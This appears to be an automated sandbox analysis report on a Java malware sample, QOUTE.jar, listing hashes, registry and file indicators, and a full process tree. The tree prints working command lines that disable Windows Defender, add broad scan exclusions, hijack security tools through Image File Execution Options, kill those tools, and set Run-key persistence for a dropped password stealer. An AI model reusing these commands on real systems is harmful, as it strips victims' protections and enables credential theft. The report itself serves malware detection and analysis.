Analysis
max time kernel: 142s
max time network: 123s
platform: windows7_x64
resource: win7v200430
submitted: 12-07-2020 08:14
Static task: static1
Behavioral task: behavioral1 (Sample: QOUTE.jar, Resource: win7v200430)
Behavioral task: behavioral2 (Sample: QOUTE.jar, Resource: win10)
General
Target: QOUTE.jar
Size: 402KB
MD5: 0a79ac74d72bd78b14f2620336eb8154
SHA1: cb35e25fd05a342c3201cc7e7c81aa4f7fca99f7
SHA256: b52f595bcd319fb9a253efa0c694fcaea8662b0fd34bb384612c1006cc112bd8
SHA512: 7b74e2c7568a38045c1d760589193e716767e568809391980df03f197515ced2c535ad0d1612e5d05f56ab1684b4bbae562764606a96106909c00e848ccf784a
Malware Config
Signatures
Executes dropped EXE 1 IoCs
Processes (pid, process):
  2896 XenAllPasswordPro.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Adds Run entry to start application 2 TTPs 4 IoCs
Processes (description, ioc, process):
  Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Windows\CurrentVersion\Run  java.exe
  Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Windows\CurrentVersion\Run\RfEhfcm = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\roBcX\\xvPwc.class\""  java.exe
  Key created \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce  java.exe
  Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\RfEhfcm = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\roBcX\\xvPwc.class\""  java.exe
Drops desktop.ini file(s) 4 IoCs
Processes (description, ioc, process):
  File opened for modification C:\Users\Admin\roBcX\Desktop.ini  java.exe
  File created C:\Users\Admin\roBcX\Desktop.ini  java.exe
  File opened for modification C:\Users\Admin\roBcX\Desktop.ini  attrib.exe
  File opened for modification C:\Users\Admin\roBcX\Desktop.ini  attrib.exe
Suspicious use of SetWindowsHookEx 1 IoCs
Processes (pid, process):
  1520 java.exe
Suspicious use of WriteProcessMemory 544 IoCs
Processes (description, pid, process, target process):
  PID 1520 wrote to memory of 1048  1520 java.exe  cmd.exe
  PID 1520 wrote to memory of 1048  1520 java.exe  cmd.exe
  PID 1520 wrote to memory of 1048  1520 java.exe  cmd.exe
  PID 1520 wrote to memory of 1036  1520 java.exe  cmd.exe
  PID 1520 wrote to memory of 1036  1520 java.exe  cmd.exe
  PID 1520 wrote to memory of 1036  1520 java.exe  cmd.exe
  PID 1036 wrote to memory of 1536  1036 cmd.exe  WMIC.exe
  PID 1036 wrote to memory of 1536  1036 cmd.exe  WMIC.exe
  PID 1036 wrote to memory of 1536  1036 cmd.exe  WMIC.exe
  PID 1520 wrote to memory of 1176  1520 java.exe  cmd.exe
  PID 1520 wrote to memory of 1176  1520 java.exe  cmd.exe
  PID 1520 wrote to memory of 1176  1520 java.exe  cmd.exe
  PID 1176 wrote to memory of 1804  1176 cmd.exe  WMIC.exe
  PID 1176 wrote to memory of 1804  1176 cmd.exe  WMIC.exe
  PID 1176 wrote to memory of 1804  1176 cmd.exe  WMIC.exe
  PID 1520 wrote to memory of 1768  1520 java.exe  attrib.exe
  PID 1520 wrote to memory of 1768  1520 java.exe  attrib.exe
  PID 1520 wrote to memory of 1768  1520 java.exe  attrib.exe
  PID 1520 wrote to memory of 1812  1520 java.exe  attrib.exe
  PID 1520 wrote to memory of 1812  1520 java.exe  attrib.exe
  PID 1520 wrote to memory of 1812  1520 java.exe  attrib.exe
  PID 1520 wrote to memory of 520  1520 java.exe  attrib.exe
  PID 1520 wrote to memory of 520  1520 java.exe  attrib.exe
  PID 1520 wrote to memory of 520  1520 java.exe  attrib.exe
  PID 1520 wrote to memory of 664  1520 java.exe  attrib.exe
  PID 1520 wrote to memory of 664  1520 java.exe  attrib.exe
  PID 1520 wrote to memory of 664  1520 java.exe  attrib.exe
  PID 1520 wrote to memory of 464  1520 java.exe  attrib.exe
  PID 1520 wrote to memory of 464  1520 java.exe  attrib.exe
  PID 1520 wrote to memory of 464  1520 java.exe  attrib.exe
  PID 1520 wrote to memory of 756  1520 java.exe  attrib.exe
  PID 1520 wrote to memory of 756  1520 java.exe  attrib.exe
  PID 1520 wrote to memory of 756  1520 java.exe  attrib.exe
  PID 1520 wrote to memory of 1144  1520 java.exe  attrib.exe
  PID 1520 wrote to memory of 1144  1520 java.exe  attrib.exe
  PID 1520 wrote to memory of 1144  1520 java.exe  attrib.exe
  PID 1520 wrote to memory of 1356  1520 java.exe  attrib.exe
  PID 1520 wrote to memory of 1356  1520 java.exe  attrib.exe
  PID 1520 wrote to memory of 1356  1520 java.exe  attrib.exe
  PID 1520 wrote to memory of 1640  1520 java.exe  cmd.exe
  PID 1520 wrote to memory of 1640  1520 java.exe  cmd.exe
  PID 1520 wrote to memory of 1640  1520 java.exe  cmd.exe
  PID 1520 wrote to memory of 1604  1520 java.exe  powershell.exe
  PID 1520 wrote to memory of 1604  1520 java.exe  powershell.exe
  PID 1520 wrote to memory of 1604  1520 java.exe  powershell.exe
  PID 1520 wrote to memory of 1636  1520 java.exe  reg.exe
  PID 1520 wrote to memory of 1636  1520 java.exe  reg.exe
  PID 1520 wrote to memory of 1636  1520 java.exe  reg.exe
  PID 1520 wrote to memory of 1624  1520 java.exe  reg.exe
  PID 1520 wrote to memory of 1624  1520 java.exe  reg.exe
  PID 1520 wrote to memory of 1624  1520 java.exe  reg.exe
  PID 1520 wrote to memory of 1580  1520 java.exe  taskkill.exe
  PID 1520 wrote to memory of 1580  1520 java.exe  taskkill.exe
  PID 1520 wrote to memory of 1580  1520 java.exe  taskkill.exe
  PID 1520 wrote to memory of 1948  1520 java.exe  reg.exe
  PID 1520 wrote to memory of 1948  1520 java.exe  reg.exe
  PID 1520 wrote to memory of 1948  1520 java.exe  reg.exe
  PID 1640 wrote to memory of 1972  1640 cmd.exe  reg.exe
  PID 1640 wrote to memory of 1972  1640 cmd.exe  reg.exe
  PID 1640 wrote to memory of 1972  1640 cmd.exe  reg.exe
  PID 1520 wrote to memory of 1968  1520 java.exe  reg.exe
  PID 1520 wrote to memory of 1968  1520 java.exe  reg.exe
  PID 1520 wrote to memory of 1968  1520 java.exe  reg.exe
  PID 1520 wrote to memory of 1992  1520 java.exe  reg.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes (pid, process):
  1604 powershell.exe
  1604 powershell.exe
Sets file execution options in registry 2 TTPs 32 IoCs
Processes (description, ioc, process):
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe\debugger = "svchost.exe"  reg.exe
  Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe  reg.exe
  Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe  reg.exe
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe\debugger = "svchost.exe"  reg.exe
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe\debugger = "svchost.exe"  reg.exe
  Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe  reg.exe
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe\debugger = "svchost.exe"  reg.exe
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe\debugger = "svchost.exe"  reg.exe
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe\debugger = "svchost.exe"  reg.exe
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe\debugger = "svchost.exe"  reg.exe
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe\debugger = "svchost.exe"  reg.exe
  Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe  reg.exe
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe\debugger = "svchost.exe"  reg.exe
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe\debugger = "svchost.exe"  reg.exe
  Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe  reg.exe
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe\debugger = "svchost.exe"  reg.exe
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe\debugger = "svchost.exe"  reg.exe
  Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe  reg.exe
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe\debugger = "svchost.exe"  reg.exe
  Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe  reg.exe
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe\debugger = "svchost.exe"  reg.exe
  Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe  reg.exe
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe\debugger = "svchost.exe"  reg.exe
  Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe  reg.exe
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe\debugger = "svchost.exe"  reg.exe
  Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe  reg.exe
  Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe  reg.exe
  Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe  reg.exe
  Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe  reg.exe
  Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe  reg.exe
  Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe  reg.exe
  Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe  reg.exe
Modifies Windows Defender Real-time Protection settings
Processes (description, ioc, process):
  Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection  reg.exe
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"  reg.exe
  Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection  reg.exe
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"  reg.exe
  Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection  reg.exe
  Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"  reg.exe
Modifies service 2 TTPs 5 IoCs
Processes (description, ioc, process):
  Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\LocalConfig  netsh.exe
  Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Enroll\HcsGroups  netsh.exe
  Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Shas  netsh.exe
  Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Qecs  netsh.exe
  Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI  netsh.exe
Suspicious use of AdjustPrivilegeToken 138 IoCs
Processes (description, pid, process):
  Token: SeIncreaseQuotaPrivilege  1536 WMIC.exe
  Token: SeSecurityPrivilege  1536 WMIC.exe
  Token: SeTakeOwnershipPrivilege  1536 WMIC.exe
  Token: SeLoadDriverPrivilege  1536 WMIC.exe
  Token: SeSystemProfilePrivilege  1536 WMIC.exe
  Token: SeSystemtimePrivilege  1536 WMIC.exe
  Token: SeProfSingleProcessPrivilege  1536 WMIC.exe
  Token: SeIncBasePriorityPrivilege  1536 WMIC.exe
  Token: SeCreatePagefilePrivilege  1536 WMIC.exe
  Token: SeBackupPrivilege  1536 WMIC.exe
  Token: SeRestorePrivilege  1536 WMIC.exe
  Token: SeShutdownPrivilege  1536 WMIC.exe
  Token: SeDebugPrivilege  1536 WMIC.exe
  Token: SeSystemEnvironmentPrivilege  1536 WMIC.exe
  Token: SeRemoteShutdownPrivilege  1536 WMIC.exe
  Token: SeUndockPrivilege  1536 WMIC.exe
  Token: SeManageVolumePrivilege  1536 WMIC.exe
  Token: 33  1536 WMIC.exe
  Token: 34  1536 WMIC.exe
  Token: 35  1536 WMIC.exe
  Token: SeIncreaseQuotaPrivilege  1536 WMIC.exe
  Token: SeSecurityPrivilege  1536 WMIC.exe
  Token: SeTakeOwnershipPrivilege  1536 WMIC.exe
  Token: SeLoadDriverPrivilege  1536 WMIC.exe
  Token: SeSystemProfilePrivilege  1536 WMIC.exe
  Token: SeSystemtimePrivilege  1536 WMIC.exe
  Token: SeProfSingleProcessPrivilege  1536 WMIC.exe
  Token: SeIncBasePriorityPrivilege  1536 WMIC.exe
  Token: SeCreatePagefilePrivilege  1536 WMIC.exe
  Token: SeBackupPrivilege  1536 WMIC.exe
  Token: SeRestorePrivilege  1536 WMIC.exe
  Token: SeShutdownPrivilege  1536 WMIC.exe
  Token: SeDebugPrivilege  1536 WMIC.exe
  Token: SeSystemEnvironmentPrivilege  1536 WMIC.exe
  Token: SeRemoteShutdownPrivilege  1536 WMIC.exe
  Token: SeUndockPrivilege  1536 WMIC.exe
  Token: SeManageVolumePrivilege  1536 WMIC.exe
  Token: 33  1536 WMIC.exe
  Token: 34  1536 WMIC.exe
  Token: 35  1536 WMIC.exe
  Token: SeIncreaseQuotaPrivilege  1804 WMIC.exe
  Token: SeSecurityPrivilege  1804 WMIC.exe
  Token: SeTakeOwnershipPrivilege  1804 WMIC.exe
  Token: SeLoadDriverPrivilege  1804 WMIC.exe
  Token: SeSystemProfilePrivilege  1804 WMIC.exe
  Token: SeSystemtimePrivilege  1804 WMIC.exe
  Token: SeProfSingleProcessPrivilege  1804 WMIC.exe
  Token: SeIncBasePriorityPrivilege  1804 WMIC.exe
  Token: SeCreatePagefilePrivilege  1804 WMIC.exe
  Token: SeBackupPrivilege  1804 WMIC.exe
  Token: SeRestorePrivilege  1804 WMIC.exe
  Token: SeShutdownPrivilege  1804 WMIC.exe
  Token: SeDebugPrivilege  1804 WMIC.exe
  Token: SeSystemEnvironmentPrivilege  1804 WMIC.exe
  Token: SeRemoteShutdownPrivilege  1804 WMIC.exe
  Token: SeUndockPrivilege  1804 WMIC.exe
  Token: SeManageVolumePrivilege  1804 WMIC.exe
  Token: 33  1804 WMIC.exe
  Token: 34  1804 WMIC.exe
  Token: 35  1804 WMIC.exe
  Token: SeIncreaseQuotaPrivilege  1804 WMIC.exe
  Token: SeSecurityPrivilege  1804 WMIC.exe
  Token: SeTakeOwnershipPrivilege  1804 WMIC.exe
  Token: SeLoadDriverPrivilege  1804 WMIC.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes (pid, process):
  2896 XenAllPasswordPro.exe
Views/modifies file attributes 1 TTPs 8 IoCs
Processes (pid, process):
  664 attrib.exe
  464 attrib.exe
  756 attrib.exe
  1144 attrib.exe
  1356 attrib.exe
  1768 attrib.exe
  1812 attrib.exe
  520 attrib.exe
Loads dropped DLL 3 IoCs
Processes (pid, process):
  1520 java.exe
  1520 java.exe
  2896 XenAllPasswordPro.exe
Kills process with taskkill 16 IoCs
Processes (pid, process):
  1580 taskkill.exe
  1372 taskkill.exe
  2440 taskkill.exe
  2664 taskkill.exe
  580 taskkill.exe
  1544 taskkill.exe
  2200 taskkill.exe
  1792 taskkill.exe
  1836 taskkill.exe
  2220 taskkill.exe
  2824 taskkill.exe
  3024 taskkill.exe
  3068 taskkill.exe
  2116 taskkill.exe
  1608 taskkill.exe
  1816 taskkill.exe
Checks for installed software on the system 1 TTPs 20 IoCs
Processes (description, ioc, process):
  Key opened \REGISTRY\MACHINE\software\Wow6432Node\microsoft\windows\currentversion\uninstall  reg.exe
  Key enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall  reg.exe
  Key opened \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\software\microsoft\windows\currentversion\uninstall  reg.exe
  Key opened \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\software\microsoft\windows\currentversion\uninstall  reg.exe
  Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService\DisplayName  reg.exe
  Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player\DisplayName  reg.exe
  Key opened \REGISTRY\MACHINE\software\microsoft\windows\currentversion\uninstall  reg.exe
  Key enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall  reg.exe
  Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}\DisplayName  reg.exe
  Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}\DisplayName  reg.exe
  Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall  reg.exe
  Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office14.PROPLUS\DisplayName  reg.exe
  Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}\DisplayName  reg.exe
  Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall  reg.exe
  Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName  reg.exe
  Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 75.0 (x64 en-US)\DisplayName  reg.exe
  Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}\DisplayName  reg.exe
  Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}\DisplayName  reg.exe
  Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}\DisplayName  reg.exe
  Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}\DisplayName  reg.exe
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
Drops file in System32 directory 2 IoCs
Processes (description, ioc, process):
  File created C:\Windows\System32\cfPjE  java.exe
  File opened for modification C:\Windows\System32\cfPjE  java.exe
Processes (nested by spawn depth; each entry is the image path in brackets followed by its command line, with the signatures it triggered beneath it)

[C:\Windows\system32\java.exe] java -jar C:\Users\Admin\AppData\Local\Temp\QOUTE.jar
  - Adds Run entry to start application
  - Drops desktop.ini file(s)
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - Loads dropped DLL
  - Drops file in System32 directory
  [C:\Windows\system32\cmd.exe] cmd.exe
  [C:\Windows\system32\cmd.exe] cmd.exe
    - Suspicious use of WriteProcessMemory
    [C:\Windows\System32\Wbem\WMIC.exe] WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
      - Suspicious use of AdjustPrivilegeToken
  [C:\Windows\system32\cmd.exe] cmd.exe
    - Suspicious use of WriteProcessMemory
    [C:\Windows\System32\Wbem\WMIC.exe] WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
      - Suspicious use of AdjustPrivilegeToken
  [C:\Windows\system32\attrib.exe] attrib +h C:\Users\Admin\Oracle
    - Views/modifies file attributes
  [C:\Windows\system32\attrib.exe] attrib +h +r +s C:\Users\Admin\.ntusernt.ini
    - Views/modifies file attributes
  [C:\Windows\system32\attrib.exe] attrib -s -r C:\Users\Admin\roBcX\Desktop.ini
    - Drops desktop.ini file(s)
    - Views/modifies file attributes
  [C:\Windows\system32\attrib.exe] attrib +s +r C:\Users\Admin\roBcX\Desktop.ini
    - Drops desktop.ini file(s)
    - Views/modifies file attributes
  [C:\Windows\system32\attrib.exe] attrib -s -r C:\Users\Admin\roBcX
    - Views/modifies file attributes
  [C:\Windows\system32\attrib.exe] attrib +s +r C:\Users\Admin\roBcX
    - Views/modifies file attributes
  [C:\Windows\system32\attrib.exe] attrib +h C:\Users\Admin\roBcX
    - Views/modifies file attributes
  [C:\Windows\system32\attrib.exe] attrib +h +s +r C:\Users\Admin\roBcX\xvPwc.class
    - Views/modifies file attributes
  [C:\Windows\system32\cmd.exe] cmd.exe
    - Suspicious use of WriteProcessMemory
    [C:\Windows\system32\reg.exe] reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
      - Checks for installed software on the system
    [C:\Windows\system32\reg.exe] reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
      - Checks for installed software on the system
  [C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe] "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\roBcX','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\roBcX\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
    - Suspicious behavior: EnumeratesProcesses
  [C:\Windows\System32\reg.exe] "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    - Sets file execution options in registry
  [C:\Windows\System32\reg.exe] "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  [C:\Windows\System32\taskkill.exe] "C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
    - Kills process with taskkill
  [C:\Windows\System32\reg.exe] "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    - Sets file execution options in registry
  [C:\Windows\System32\reg.exe] "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
    - Modifies Windows Defender Real-time Protection settings
  [C:\Windows\System32\reg.exe] "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    - Sets file execution options in registry
  [C:\Windows\System32\reg.exe] "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
    - Modifies Windows Defender Real-time Protection settings
  [C:\Windows\System32\reg.exe] "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
    - Modifies Windows Defender Real-time Protection settings
  [C:\Windows\System32\reg.exe] "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    - Sets file execution options in registry
  [C:\Windows\system32\cmd.exe] cmd.exe
    [C:\Windows\system32\reg.exe] reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
      - Checks for installed software on the system
    [C:\Windows\system32\reg.exe] reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
      - Checks for installed software on the system
  [C:\Windows\System32\reg.exe] "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    - Sets file execution options in registry
  [C:\Windows\System32\reg.exe] "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    - Sets file execution options in registry
  [C:\Windows\System32\reg.exe] "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    - Sets file execution options in registry
  [C:\Windows\System32\reg.exe] "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    - Sets file execution options in registry
  [C:\Windows\System32\taskkill.exe] "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
    - Kills process with taskkill
  [C:\Windows\system32\cmd.exe] cmd.exe
    [C:\Windows\system32\reg.exe] reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
      - Checks for installed software on the system
    [C:\Windows\system32\reg.exe] reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
  [C:\Windows\System32\reg.exe] "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    - Sets file execution options in registry
  [C:\Windows\System32\reg.exe] "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    - Sets file execution options in registry
  [C:\Windows\System32\reg.exe] "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    - Sets file execution options in registry
  [C:\Windows\System32\reg.exe] "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
    - Sets file execution options in registry
  [C:\Windows\system32\cmd.exe] cmd.exe
    [C:\Windows\system32\reg.exe] reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
